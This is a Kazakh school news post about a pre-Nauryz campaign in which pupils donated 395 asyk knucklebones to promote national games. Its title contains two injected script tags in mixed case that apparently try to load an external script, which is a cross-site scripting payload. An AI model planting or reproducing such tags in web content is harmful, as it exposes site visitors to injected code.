"Мектепке асық сыйла" акциясы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.03.2024

Біртұтас тәрбие бағдарламасы аясында ұлттық құндылықтарды дәріптеу мақсатында, логопед мұғалім Есілбай Баян Сайлауқызының ұйымдастыруымен  меткебімізде Науырыз меркесі қарсаңында «мектебіме асық сыйлаймын акциясы» болып өтті.
Акцияның  мақсаты; білім алушыларды рухани-адамгершілік, эстетикалық, патриоттық бағытта тәрбиелеу, мәдени құндылықтарды сақтау және ұлттық ойындарды дәріптеу.Ұмытылып бара жатқан ұлттық құндылықтарды қайта жаңғыртып, жас ұрпақтың ұлттық ойын түрлеріне деген қызығушылықтарын арттыру, қазақ халқының төл мұрасын қастерлеуге баулу. Асықтарды сыйлау арқылы оқушыларға бір біріне деген сыйластықтарын мектепке деген жан ашырлықтарын нығайту.
Акцияға барлық сыныптар атсалысып қатысты.Оның ішінде бастауыш сыныптары белсенділік танытты. Ең көп асықты  1 «Ә» сыныбы – 106 асық сыйлады. Барлығы 395  асық  мектеп қоржынына салынды .Асық сыйлаған сыныптарға сыйлықтармен қатар  алғыс хаттармен және мадақтамалар мен марапатталды.

Просмотров: 477


Пікір қосу



Деректерді қолтаңбаға қосу